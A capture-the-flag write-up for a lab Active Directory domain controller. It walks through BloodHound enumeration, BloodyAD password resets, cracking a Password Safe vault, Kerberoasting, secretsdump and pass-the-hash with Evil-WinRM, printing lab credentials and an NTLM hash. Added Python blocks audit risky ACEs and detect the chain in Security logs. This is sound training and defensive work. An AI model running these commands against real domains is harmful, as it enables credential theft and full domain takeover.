Explore the fundamentals of cybersecurity in the University Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.42 administrator.htb

Script to add hosts automatically

ip="10.10.11.42"
domain="administrator.htb"
# Append the entry only if an identical line is not already present
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV administrator.htb

Nmap scan report for administrator.htb (10.10.11.42)
Host is up (0.056s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-18 18:45:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time: 
|   date: 2024-11-18T18:45:39
|_  start_date: N/A

BloodHound Enumeration

Run BloodHound to collect Active Directory data:

bloodhound-python -c All -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42
  • After ingesting the collected data into BloodHound, we find that Olivia has the GenericAll permission over Michael.
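A GenericAll edge like the one BloodHound shows here is a DACL misconfiguration that a defender can find in the same collector output before anyone abuses it. The script below is an added example, not part of the writeup or of the BloodHound project: it reads a users.json-style document and reports high-impact rights held by principals other than the built-in admin groups and SYSTEM. The JSON embedded in it is constructed to approximate the collector's "Aces" layout (the domain SID and RIDs are made up), and the list of "expected" holders is an assumption you would tune to your own domain.

```python
"""Flag high-impact ACEs held by principals that should not have them.

Added example; the sample JSON is constructed and only approximates the
bloodhound-python users.json layout (ObjectIdentifier, Properties.name, Aces[]).
"""
import json

# Rights that let the holder take over the target object outright
HIGH_IMPACT_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
    "ForceChangePassword", "AllExtendedRights", "Owns",
}
# Holders we expect to see (assumption): SYSTEM, BUILTIN\Administrators,
# Account Operators, and the domain-relative RIDs of Domain Admins (512),
# Schema Admins (518) and Enterprise Admins (519).
EXPECTED_SIDS = {"S-1-5-18", "S-1-5-32-544", "S-1-5-32-548"}
EXPECTED_RIDS = {"512", "518", "519"}

# Constructed sample: a fake domain SID prefix, two users, and two ACEs on MICHAEL
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {
            "ObjectIdentifier": "S-1-5-21-111-222-333-1108",
            "Properties": {"name": "OLIVIA@ADMINISTRATOR.HTB"},
            "Aces": [],
        },
        {
            "ObjectIdentifier": "S-1-5-21-111-222-333-1109",
            "Properties": {"name": "MICHAEL@ADMINISTRATOR.HTB"},
            "Aces": [
                # Inherited GenericAll from Domain Admins: expected, not reported
                {"PrincipalSID": "S-1-5-21-111-222-333-512", "PrincipalType": "Group",
                 "RightName": "GenericAll", "IsInherited": True},
                # Explicit GenericAll granted to an ordinary user: reported
                {"PrincipalSID": "S-1-5-21-111-222-333-1108", "PrincipalType": "User",
                 "RightName": "GenericAll", "IsInherited": False},
            ],
        },
    ],
    "meta": {"type": "users", "count": 2},
})


def is_expected_holder(sid: str) -> bool:
    """True for well-known admin SIDs or RIDs of the privileged domain groups."""
    return sid in EXPECTED_SIDS or sid.rsplit("-", 1)[-1] in EXPECTED_RIDS


def find_risky_aces(users_json_text: str):
    """Return (holder_name, right, target_name) for every unexpected high-impact ACE."""
    doc = json.loads(users_json_text)
    # Resolve SIDs to names using the objects present in the same file
    names = {o["ObjectIdentifier"]: o["Properties"]["name"] for o in doc["data"]}
    findings = []
    for obj in doc["data"]:
        for ace in obj.get("Aces", []):
            right, holder = ace["RightName"], ace["PrincipalSID"]
            if right in HIGH_IMPACT_RIGHTS and not is_expected_holder(holder):
                findings.append((names.get(holder, holder), right, obj["Properties"]["name"]))
    return findings


if __name__ == "__main__":
    for holder, right, target in find_risky_aces(SAMPLE_USERS_JSON):
        print(f"{holder} has {right} over {target}")
```

Run it against a real users.json (and the groups.json/computers.json files, which use the same Aces layout) to get a remediation list; each finding is an ACE to remove or a delegation to justify.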

Changing Passwords with BloodyAD

Change Michael’s Password

bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "olivia" -p "ichliebedich" set password "michael" "Password@123"

Change Benjamin’s Password

bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "michael" -p "Password@123" set password "benjamin" "Password@123"

Accessing FTP

Log in to FTP with Benjamin’s credentials:

ftp 10.10.11.42
  • Username: benjamin
  • Password: Password@123

Download the backup file:

ls
get Backup.psafe3

Cracking the Password Safe File

Crack the password safe file:

hashcat -m 5200 -a 0 Backup.psafe3 /usr/share/dict/rockyou.txt
  • Cracked Password: tekieromucho
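Hashcat mode 5200 works because a Password Safe V3 file carries everything needed to check a passphrase in its first 72 bytes: the "PWS3" tag, a 32-byte salt, a little-endian iteration count ITER, and H(P'), the SHA-256 of the stretched key. The following is an added example, not code from the writeup or the Password Safe project, that builds and verifies such a header prefix according to the published formatV3 layout; the salt, passphrase and ITER value used in it are constructed, and no encrypted body is produced because none is needed for the check.

```python
"""Password Safe V3 header prefix: key stretching and passphrase verification.

Added example. Layout per the formatV3 specification:
  TAG "PWS3" | SALT (32) | ITER (4, little-endian) | H(P') (32) | ...body...
Stretched key: X_0 = SHA-256(P || SALT); X_i = SHA-256(X_{i-1}); P' = X_ITER.
The header stores H(P') = SHA-256(P') so the reader can reject a wrong
passphrase before touching the encrypted body.
"""
import hashlib
import os
import struct

HEADER_PREFIX_LEN = 4 + 32 + 4 + 32


def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Compute P' by hashing P||SALT once and then re-hashing ITER times."""
    x = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def build_header_prefix(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Build the first 72 bytes of a V3 file for a given passphrase (constructed file)."""
    if len(salt) != 32:
        raise ValueError("SALT must be 32 bytes")
    hp = hashlib.sha256(stretch_key(passphrase, salt, iterations)).digest()
    return b"PWS3" + salt + struct.pack("<I", iterations) + hp


def parse_header_prefix(blob: bytes):
    """Split a V3 header prefix into (salt, iterations, H(P'))."""
    if len(blob) < HEADER_PREFIX_LEN or blob[:4] != b"PWS3":
        raise ValueError("not a Password Safe V3 header")
    salt = blob[4:36]
    (iterations,) = struct.unpack("<I", blob[36:40])
    return salt, iterations, blob[40:72]


def passphrase_matches(blob: bytes, candidate: bytes) -> bool:
    """The same check the Password Safe client performs when opening a file."""
    salt, iterations, hp = parse_header_prefix(blob)
    return hashlib.sha256(stretch_key(candidate, salt, iterations)).digest() == hp


if __name__ == "__main__":
    # Constructed sample file: random salt, 2048 iterations, a made-up passphrase
    header = build_header_prefix(b"correct horse battery staple", os.urandom(32), 2048)
    print(passphrase_matches(header, b"correct horse battery staple"))
```

The iteration count only multiplies the cost of each guess; it does not change the fact that a passphrase present in a wordlist falls to a dictionary run, which is what the hashcat step above demonstrates. The defensive lesson from this box is that a vault protecting domain credentials needs a long, non-dictionary passphrase, and that it should not be left readable on an FTP share.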

Install a Password Safe client (e.g., the pwsafe desktop application) and open Backup.psafe3 with the cracked password.

Extracted credentials:

  • alexander: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
  • emily: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
  • emma: WwANQWnmJnGV07WQN8bMS7FMAbjNur

Accessing the Machine via Evil-WinRM

Log in as Emily:

evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Retrieve the user flag:

cat \users\emily\Desktop\user.txt

Kerberoasting Attack

Attempt Kerberoasting:

targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

The attempt fails with a clock-skew error:

[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Fix the clock skew:

# Kerberos rejects requests whose timestamp is more than 5 minutes off the KDC's clock.
# Read the DC's offset (seconds) from `ntpdate -q` and run the tool under a matching fake time.
serverskew=$(ntpdate -q administrator.htb | awk '{print $6}' | head -n 1 | tr -d '+,' | cut -d '.' -f 1)
faketime "$(date -d "+$serverskew seconds" +"%Y-%m-%d %H:%M:%S")" targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Save the hash to hash.txt.

Crack the hash:

hashcat hash.txt /usr/share/dict/rockyou.txt
  • Cracked Password: limpbizkit

Dumping Secrets with SecretsDump

Dump the domain secrets with secretsdump.py using the credentials recovered for Ethan:

secretsdump.py 'administrator.htb/ethan:limpbizkit'@'administrator.htb'
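Every step of this chain leaves a distinct trace in the domain controller's Security log: the BloodyAD password resets produce event 4724, the Kerberoast request produces a 4769 with RC4 (0x17) encryption for a user account's SPN, and the secretsdump run exercises the DS-Replication-Get-Changes control-access rights, logged as 4662. The detector below is an added example (not from the writeup or from any of the tools it mentions) that runs those three checks over constructed JSON-per-line events using the Windows EventData field names; the helpdesk allow-list and the account names in the samples are assumptions.

```python
"""Detect the three loudest steps of this chain in Security-log events.

Added example. Events are constructed JSON lines using Windows EventData field
names (SubjectUserName, TargetUserName, ServiceName, TicketEncryptionType,
Properties); a SIEM export would look similar but carry more fields.
"""
import json

# Control-access right GUIDs reported in 4662 when directory replication is requested
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
RC4_HMAC = "0x17"
# Assumption: only this account is permitted to reset other users' passwords
PASSWORD_RESET_ALLOWLIST = {"helpdesk-svc"}

SAMPLE_EVENTS = [  # constructed sample log, one JSON object per line
    '{"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"}',
    '{"EventID": 4724, "SubjectUserName": "helpdesk-svc", "TargetUserName": "emma"}',
    '{"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB", '
    '"ServiceName": "ethan", "TicketEncryptionType": "0x17"}',
    '{"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB", '
    '"ServiceName": "DC$", "TicketEncryptionType": "0x12"}',
    '{"EventID": 4662, "SubjectUserName": "ethan", "Properties": '
    '"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "DC$", "Properties": '
    '"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}',
]


def detect(lines):
    """Return (rule, actor, target) tuples for every suspicious event."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        eid = ev.get("EventID")
        subject = ev.get("SubjectUserName", "")
        if eid == 4724 and subject.lower() not in PASSWORD_RESET_ALLOWLIST:
            # Someone outside the allow-list reset another account's password
            alerts.append(("password-reset-by-unexpected-account", subject, ev["TargetUserName"]))
        elif eid == 4769:
            service = ev.get("ServiceName", "")
            # RC4 service ticket for a user account SPN (not a computer$, not krbtgt)
            if (ev.get("TicketEncryptionType") == RC4_HMAC
                    and not service.endswith("$") and service.lower() != "krbtgt"):
                alerts.append(("rc4-tgs-for-user-spn", ev["TargetUserName"], service))
        elif eid == 4662 and not subject.endswith("$"):
            # Replication rights used by something other than a domain controller
            props = ev.get("Properties", "").lower()
            if REPL_GET_CHANGES in props or REPL_GET_CHANGES_ALL in props:
                alerts.append(("replication-rights-used-by-non-dc", subject, "directory"))
    return alerts


if __name__ == "__main__":
    for rule, actor, target in detect(SAMPLE_EVENTS):
        print(f"{rule}: {actor} -> {target}")
```

The 4662 rule depends on auditing being enabled for Directory Service Access on the domain controllers, and the 4769 rule assumes service accounts are configured for AES so that an RC4 request stands out; both are worth verifying before relying on these signals.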

Gaining Administrator Access

Log in as Administrator using the dumped NTLM hash:

evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'

Retrieve the root flag:

type \users\administrator\desktop\root.txt